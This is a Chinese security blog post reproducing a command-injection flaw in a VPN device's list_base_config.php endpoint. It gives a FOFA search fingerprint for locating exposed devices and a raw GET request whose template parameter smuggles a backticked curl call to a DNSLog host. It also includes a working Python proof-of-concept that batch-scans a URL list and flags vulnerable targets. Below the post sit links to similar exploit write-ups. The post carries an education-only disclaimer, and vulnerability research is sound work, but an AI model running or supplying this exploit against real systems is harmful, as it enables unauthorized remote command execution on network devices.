【漏洞复现】某某康达vpn——list_base_config.php——命令执行

最新推荐文章于 2024-09-17 19:54:08 发布
最新推荐文章于 2024-09-17 19:54:08 发布
阅读量646 收藏 9
点赞数 3
分类专栏: 漏洞复现 文章标签: 网络安全 安全 渗透测试 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LongL_GuYu/article/details/141257047
版权

声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。

文章目录

漏洞描述

网络设备是支撑计算机网络运行的重要硬件,包括路由器、交换机、网桥、网卡、集线器、防火墙、调制解调器和无线接入点等。路由器负责网络间的数据转发和地址转换,交换机用于局域网内设备的互联和数据交换,网桥连接不同网段实现互通,网卡提供有线或无线网络接口。防火墙则对网络流量进行监控和控制,保护网络安全。某某康达vpn,其接口list_base_config.php存在命令执行漏洞,攻击者可通过该漏洞获取系统权限。

漏洞复现

1)信息收集
fofa:body="/images/raisecom/back.gif"
在这里插入图片描述

凡是过去,皆为序章;凡是未来,皆有可期。
在这里插入图片描述

获取DNSLog
在这里插入图片描述
构造数据包

GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60curl%DNS.log%60 HTTP/1.1
Host:ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close

在这里插入图片描述
回到DNSLog查看回显
在这里插入图片描述
成功回显,验证成功。

测试工具

poc

import requests
import urllib3
import re,string,random
from urllib.parse import urljoin
import argparse
import time
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls

def check(url):
    url = url.rstrip("/")
    try:
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1284.0 Safari/537.13",
        }
        getdomain = requests.get(url='http://dnslog.cn/getdomain.php', headers={"Cookie": "PHPSESSID=5q814qoa1oi4ck076cjstma9g2"}, timeout=30)
        domain = str(getdomain.text)
        target_url = urljoin(url,"/vpn/list_base_config.php?type=mod&parts=base_config&template=%60curl%20{}%60".format(domain))
        requests.get(target_url, verify=False, headers=headers, timeout=40)
        for i in range(0, 3):
            refresh = requests.get(url='http://dnslog.cn/getrecords.php', headers={"Cookie": "PHPSESSID=5q814qoa1oi4ck076cjstma9g2"}, timeout=30)
            time.sleep(2)
            if domain in refresh.text:
                print(f"\033[31mDiscovered:{url}: raiseco_list_base_config_RCE!\033[0m")
                return True
    except Exception as e:
        pass


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        check(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        print("help")

运行截图
在这里插入图片描述

你可以期待太阳从东方升起,而风却随心所欲地从四面八方吹来。

Long._.L
关注
专栏目录
用友U8 CRM reservationcomplete.php SQL注入致RCE漏洞复现
0xSec
07-26 1450
​用友U8CRM客户关系管理系统reservationcomplete.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
Ivanti Connect Secure VPN SSRF漏洞复现(CVE-2024-21893)
0xSec
02-06 1148
漏洞是由于Ivanti Connect Secure、Ivanti Policy Secure和 Ivanti Neurons for ZTA 的 SAML 组件中存在服务器端请求伪造漏洞,因此攻击者可利用该漏洞在未经身份验证的情况下访问某些受限资源,结合相关功能造成远程代码执行
泛微 e-cology OA 远程代码执行漏洞复现(亲测有效)
花花的博客
12-09 1万+
你踩过的坑,我都填过,哇哈哈哈哈哈 0x00前言 整个环境搭下来,安装的东西有点多,遇到的问题也不少,说复杂,但是搭完感觉还好并不难。大家不要觉得很难懒得搭,一定要耐心一步一步的搭建。 0x01漏洞简介 1.漏洞成因 该漏洞位于 e-cology OA系统BeanShell组件中,并且该组件允许未授权访问,攻击者可通过访问该组件执行任意的Java代码,也就是说可以执行任意命令 2. 影...
HW漏洞威胁情报第一天|HW情报
weixin_43167326的博客
07-24 412
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!蓝凌EKP存在sys_ui_component远程命令执行漏洞亿赛通数据泄露防护(DLP)系统NoticeAjax接口存在SQL注入漏洞天问物业ERP系统AreaAvatarDownLoad存在任意文件读取漏洞
漏洞复现】上海冰峰ICEFLOW VPN信息泄露漏洞
晚风不及你
01-26 641
上海冰峰计算机网络技术有限公司是国内VPN、流量管理、行为管理、链路负载均衡、下一代防火墙设备供应商和IT价值解决方案提供商。冰峰网络reporter系统是一套数据报表管理系统。
漏洞复现】Web user login存在RCE漏洞
网安小白
08-16 414
Web user login存在RCE漏洞
某某市电子政务__协同办公平台和门户网站方案__投标方案说明.doc
12-01
某某市电子政务__协同办公平台和门户网站方案__投标方案说明.doc
v279-1_fotiaoqiang_darwin_amd64_install.pkg
12-09
v279-1_fotiaoqiang_darwin_amd64_install.pkg
某某轮胎传播策划——看看人家怎样卖轮胎.pptx
10-31
【市场状况】 当前轮胎市场竞争激烈,各轮胎企业通过价格战、服务提升和营销网络建设来争夺市场份额。原配胎在当地市场占据一定地位,受到地区经济保护主义影响。此外,公务用车、客运车和货运车市场各有其特殊需求...
aText_2.38.5__HCiSO__xclient.info.dmg.zip
06-28
aText 是一款输入增强工具,例如你经常输入 你家的地址 “某某市,某某街,某某区.. ”等很长的一段话,你可能会把他保存到某个地方,每次都复制,粘贴一下才能使用,相当没有效率。使用了aText后,把经常输入 的 ...
郑某某-Java-乐驰_嵌入式_java简历_程序员简历模板_计算机相关专业.doc
08-07
12. Linux 操作系统:郑某某熟悉 Linux 常用命令。 13. 项目经验:郑某某有两个项目经验,分别是淘嘟嘟网上商城和快捷物流管理系统。 14. 系统设计:郑某某参与了淘嘟嘟网上商城的需求分析和项目构建,负责前台...
CVE-2018-13379 环境搭建+漏洞复现
yxngu
07-29 6779
正入万山圈子里,一山放过一山拦。
漏洞复现
热门推荐
内心不种满鲜花就会长满杂草
03-03 1万+
weblogic WebLogic T3 协议反序列化远程命令执行(CVE-2020-2883) Weblogic Server远程代码执行漏洞(CVE-2021-2109 ) apache Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530) Apache Druid RCE(CVE-2021-25646) Apache Tomcat 文件包含漏洞(CVE-2020-1938) Apache Flink(CVE-2020-17518/17519)任意文件上传和路径遍
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8461
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
时间&安全精细化管理平台存在未授权访问漏洞
2301_77012231的博客
09-14 417
登录--时间&安全精细化管理平台存在未授权访问漏洞导致与员工信息泄露。
2024网络安全人才实战能力白皮书安全测试评估篇
2301_76786857的博客
09-13 852
据了解,白皮书通过大量一线网络安全从业人员、网络安全相关专业在校学生问卷调研数据及网络安全人才测评演练数据分析,呈现供给侧、需求侧安全测试评估人才的基本情况、培养情况和岗位实践,并以理论与实践相结合的方式创新提出了一套立体化综合评价安全测评人才能力的——GPE方法,为数字中国建设中的安全测试评估人才培养和评价提供可行方案。当前,在政治、经济、文化和社会安全等多个领域相互交织影响的背景下,网络安全测评是政府保障国家安全和社会稳定的重要手段之一,社会急需网络安全测评人才,防范化解风险提供安全保障。
Java代码审计篇 | ofcms系统审计思路讲解 - 篇4 | XXE漏洞审计
哦 卷!
09-14 885
我发现很多文章包括教程,大概套路是:只说有漏洞的点,将有漏洞的点指出,然后分析代码;或者黑盒测试出漏洞之后,然后分析代码。我认为这是在分析漏洞代码,而非代码审计。代码审计文章或教程应该是从0开始找到漏洞所在,包括思路!所以这里不管有没有漏洞,我都会把审计过程写出来,因此篇幅会很长,但我认为这样对你会很有帮助。知其然亦知所以然。XXE漏洞审计Java代码审计篇 | ofcms系统审计思路讲解 - 篇1 | 环境搭建、路由机制。
对称密码中的密钥是如何实现安全配送的?
最新发布
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
09-17 539
密钥配送问题是指在对称密码算法中,加密和解密使用同一个密钥,发送方必须设法将密钥安全地发送给接收方,而不会被第三方窃听者截获。如果密钥被窃取,那么加密的数据也会被破解,因此密钥的安全配送成为对称密码算法的一个关键问题。为了解决这个问题,密码学领域发展出了多种策略和解决方案。通过通信双方事先共享密钥密钥来解决通过密钥分配中心(KDC)来解决通过密钥交换Diffie-Hellman(DH)来解决通过公钥密码来解决。
function initXj() { var s= 0 ; for(var i=1;i<=goodCount;i++) { var xj=parseFloat($('#goodPrice_'+i).val())*parseInt($('#goodNumber_'+i).val()); $("#goodXj_"+i).html(xj); } } function getIds() { var s="" ; for(var i=1;i<=goodCount;i++) { if(s=="") s=$("#goodId_"+i).val(); else s+=","+$("#goodId_"+i).val(); } return s; } function getNumbers() { var s="" ; for(var i=1;i<=goodCount;i++) { if(s=="") s=$("#goodNumber_"+i).val(); else s+=","+$("#goodNumber_"+i).val(); } return s; }这段代码是什么意思
06-03
这段代码是一个 JavaScript 函数,其中包含了三个子函数 initXj、getIds 和 getNumbers。这些函数用于处理一个购物车页面中的商品信息。initXj 函数会计算每个商品的小计金额,并将结果显示在页面中的相应位置;getIds 函数会获取所有商品的 ID 号,并将其以逗号分隔的字符串形式返回;getNumbers 函数会获取所有商品的数量,并将其以逗号分隔的字符串形式返回。这些函数可能被用于提交订单等操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值